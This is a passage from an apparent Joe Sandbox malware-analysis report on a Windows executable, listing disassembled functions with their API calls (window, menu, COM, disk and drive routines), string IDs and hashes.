                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                            • String ID:
                                                            • API String ID: 641708696-0
                                                            • Opcode ID: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
                                                            • Instruction ID: edfb5b42e1aee2da2af7767ce8276f4fdeab99f29820ea46fc720bac3244b47a
                                                            • Opcode Fuzzy Hash: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
                                                            • Instruction Fuzzy Hash: B0617E34101B10DFD735AF14CA48B2A77F1FB44316F50943EE642AAAE0C7B8A891DB99
                                                            APIs
                                                              • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                            • GetSysColor.USER32(0000000F), ref: 004021D3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ColorLongWindow
                                                            • String ID:
                                                            • API String ID: 259745315-0
                                                            • Opcode ID: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
                                                            • Instruction ID: b625a7fc61febfd2c935065ad26fa2a4911c749eaed189314b0e0014d1ee1d2c
                                                            • Opcode Fuzzy Hash: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
                                                            • Instruction Fuzzy Hash: 0B41E531000100EFDB215F68DC8CBBA3B65EB46331F1442BAFE619A2E1C7758C86DB69
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?,0048F910), ref: 0046A90B
                                                            • GetDriveTypeW.KERNEL32(00000061,004B89A0,00000061), ref: 0046A9D5
                                                            • _wcscpy.LIBCMT ref: 0046A9FF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: BuffCharDriveLowerType_wcscpy
                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                            • API String ID: 2820617543-1000479233
                                                            • Opcode ID: 75c02351080d399f54f50797f1575012d7efe7bac2141c4c0566531984a89c98
                                                            • Instruction ID: 63d5a068ad5a56aba220708db6a6aa365c702eef260e2cf9077a2f95fd26ae7a
                                                            • Opcode Fuzzy Hash: 75c02351080d399f54f50797f1575012d7efe7bac2141c4c0566531984a89c98
                                                            • Instruction Fuzzy Hash: 6751AE711183009BC700EF15C892AAFB7E5EF94308F544C2FF495672A2EB399D19CA5B
                                                            APIs
                                                            • _memset.LIBCMT ref: 0048716A
                                                            • CreateMenu.USER32 ref: 00487185
                                                            • SetMenu.USER32(?,00000000), ref: 00487194
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487221
                                                            • IsMenu.USER32(?), ref: 00487237
                                                            • CreatePopupMenu.USER32 ref: 00487241
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0048726E
                                                            • DrawMenuBar.USER32 ref: 00487276
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                            • String ID: 0$F
                                                            • API String ID: 176399719-3044882817
                                                            • Opcode ID: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
                                                            • Instruction ID: ef621a00a8965f8f9a50d7f8a7e1c0e3a51c02c5d80a3ac9dc969039337b3b35
                                                            • Opcode Fuzzy Hash: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
                                                            • Instruction Fuzzy Hash: 2A419B74A01204EFDB10EF64D898E9E7BB5FF09300F240469F915A7361D735A910DF98
                                                            APIs
                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0048755E
                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00487565
                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00487578
                                                            • SelectObject.GDI32(00000000,00000000), ref: 00487580
                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0048758B
                                                            • DeleteDC.GDI32(00000000), ref: 00487594
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0048759E
                                                            • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 004875B2
                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004875BE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                            • String ID: static
                                                            • API String ID: 2559357485-2160076837
                                                            • Opcode ID: 2462904ef93fc367447b653beb19009bbb9b8e29659318a1c617b8df96e81b81
                                                            • Instruction ID: 1923f87f84a105141cc97cd4dfb73f9ea5de9f9edaf5dec82e4c1ac095da0f9d
                                                            • Opcode Fuzzy Hash: 2462904ef93fc367447b653beb19009bbb9b8e29659318a1c617b8df96e81b81
                                                            • Instruction Fuzzy Hash: FA316D72104214BBDF11AF64DC08FDF3BA9FF09364F210A29FA15A61A0D739D815DBA8
                                                            APIs
                                                            • _memset.LIBCMT ref: 00426E3E
                                                              • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                            • __gmtime64_s.LIBCMT ref: 00426ED7
                                                            • __gmtime64_s.LIBCMT ref: 00426F0D
                                                            • __gmtime64_s.LIBCMT ref: 00426F2A
                                                            • __allrem.LIBCMT ref: 00426F80
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426F9C
                                                            • __allrem.LIBCMT ref: 00426FB3
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426FD1
                                                            • __allrem.LIBCMT ref: 00426FE8
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00427006
                                                            • __invoke_watson.LIBCMT ref: 00427077
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                            • String ID:
                                                            • API String ID: 384356119-0
                                                            • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                            • Instruction ID: cc18d51bddcb3bff235d9ba930da6ebb912618c2495e950f743dda1aeb2a8d13
                                                            • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                            • Instruction Fuzzy Hash: F8710876B00726ABD714AF79EC41B5BB3A4AF04328F55412FF514D7281EB78ED048B98
                                                            APIs
                                                            • _memset.LIBCMT ref: 00462542
                                                            • GetMenuItemInfoW.USER32(004C5890,000000FF,00000000,00000030), ref: 004625A3
                                                            • SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 004625D9
                                                            • Sleep.KERNEL32(000001F4), ref: 004625EB
                                                            • GetMenuItemCount.USER32(?), ref: 0046262F
                                                            • GetMenuItemID.USER32(?,00000000), ref: 0046264B
                                                            • GetMenuItemID.USER32(?,-00000001), ref: 00462675
                                                            • GetMenuItemID.USER32(?,?), ref: 004626BA
                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00462700
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462714
                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462735
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                            • String ID:
                                                            • API String ID: 4176008265-0
                                                            • Opcode ID: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
                                                            • Instruction ID: d041e2a6511ad081bd824cff42eca7b157938f8ca15e77e0b80393dec237999e
                                                            • Opcode Fuzzy Hash: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
                                                            • Instruction Fuzzy Hash: 3361B470900A49BFDB11CF64CE84DBF7BB8FB01345F14046AE842A7251E7B9AD05DB2A
                                                            APIs
                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00486FA5
                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00486FA8
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00486FCC
                                                            • _memset.LIBCMT ref: 00486FDD
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00486FEF
                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00487067
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$LongWindow_memset
                                                            • String ID:
                                                            • API String ID: 830647256-0
                                                            • Opcode ID: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
                                                            • Instruction ID: 7132dcb9391edd1f4fca7d59f8acd98ed1f58d557d43f29f177e0b8d5bde9df6
                                                            • Opcode Fuzzy Hash: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
                                                            • Instruction Fuzzy Hash: 17618E75900208AFDB10EFA4CC85EEE77B8EB09700F20056AFA14A73A1C775AD51DB64
                                                            APIs
                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00456BBF
                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 00456C18
                                                            • VariantInit.OLEAUT32(?), ref: 00456C2A
                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00456C4A
                                                            • VariantCopy.OLEAUT32(?,?), ref: 00456C9D
                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00456CB1
                                                            • VariantClear.OLEAUT32(?), ref: 00456CC6
                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 00456CD3
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CDC
                                                            • VariantClear.OLEAUT32(?), ref: 00456CEE
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CF9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                            • String ID:
                                                            • API String ID: 2706829360-0
                                                            • Opcode ID: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
                                                            • Instruction ID: 21fd5a8c16b11a42553d074c3324144f158a868588d4a73b9a3ed32873cef97c
                                                            • Opcode Fuzzy Hash: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
                                                            • Instruction Fuzzy Hash: F1418231A001199FCF00DFA9D8449AEBBB9EF18315F01847EE955E7362CB34A949CF94
                                                            APIs
                                                              • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                              • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                            • CoInitialize.OLE32 ref: 00478403
                                                            • CoUninitialize.OLE32 ref: 0047840E
                                                            • CoCreateInstance.OLE32(?,00000000,00000017,00492BEC,?), ref: 0047846E
                                                            • IIDFromString.OLE32(?,?), ref: 004784E1
                                                            • VariantInit.OLEAUT32(?), ref: 0047857B
                                                            • VariantClear.OLEAUT32(?), ref: 004785DC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                            • API String ID: 834269672-1287834457
                                                            • Opcode ID: eb63f8d69043fbd752c9a475b61fc08905a9fa1abf1737b64fd3052273e3a83e
                                                            • Instruction ID: cb75df2b24e16c1c2e0b5d8d850f15e0fc33cba1d2aa6ec0deb68a9cf625d14d
                                                            • Opcode Fuzzy Hash: eb63f8d69043fbd752c9a475b61fc08905a9fa1abf1737b64fd3052273e3a83e
                                                            • Instruction Fuzzy Hash: AA61C170648312AFC710DF14C848B9FB7E8AF44744F00881EF9899B291DB78ED48CB9A
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0046B4D0
                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0046B546
                                                            • GetLastError.KERNEL32 ref: 0046B550
                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 0046B5BD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                            • API String ID: 4194297153-14809454
                                                            • Opcode ID: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
                                                            • Instruction ID: 3fb85926d1a8df40b98e85eadc692d0a6e2328ff5e483d9ffe01cb822ebdbf3c
                                                            • Opcode Fuzzy Hash: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
                                                            • Instruction Fuzzy Hash: 29318675A00205AFCB00EB68C845AEE77B4FF45318F10416BF506D7291EB799E86CB9A
                                                            APIs
                                                              • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                              • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00459014
                                                            • GetDlgCtrlID.USER32 ref: 0045901F
                                                            • GetParent.USER32 ref: 0045903B
                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 0045903E
                                                            • GetDlgCtrlID.USER32(?), ref: 00459047
                                                            • GetParent.USER32(?), ref: 00459063
                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00459066
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 1536045017-1403004172
                                                            • Opcode ID: 70b00899020a6935ed5be547ea879312aebc4391e40c277213c8505d4346909e
                                                            • Instruction ID: 6714b25adca5f569a88cfbaafbe7bd2dd1ba81f724cd7e2599907f028ed7346a
                                                            • Opcode Fuzzy Hash: 70b00899020a6935ed5be547ea879312aebc4391e40c277213c8505d4346909e
                                                            • Instruction Fuzzy Hash: D021D870A00108BFDF04ABA1CC85EFEB774EF45310F10062AF911672E2DB795819DB28
                                                            APIs
                                                              • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                              • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004590FD
                                                            • GetDlgCtrlID.USER32 ref: 00459108
                                                            • GetParent.USER32 ref: 00459124
                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00459127
                                                            • GetDlgCtrlID.USER32(?), ref: 00459130
                                                            • GetParent.USER32(?), ref: 0045914C
                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 0045914F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 1536045017-1403004172
                                                            • Opcode ID: 76c298384857a0c05b8993852c86e7b1b6c4ac97cbcf8f08457efd25aebf9e7b
                                                            • Instruction ID: 4d8cd3b83cca1d69534b37f7086261ba2dc9307f4c099413b547fbd15d3c7d68
                                                            • Opcode Fuzzy Hash: 76c298384857a0c05b8993852c86e7b1b6c4ac97cbcf8f08457efd25aebf9e7b
                                                            • Instruction Fuzzy Hash: AA21B674A00108BFDF01ABA5CC85EFEBB74EF44301F50452BB911A72A2DB795819DB29
                                                            APIs
                                                            • GetParent.USER32 ref: 0045916F
                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00459184
                                                            • _wcscmp.LIBCMT ref: 00459196
                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00459211
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
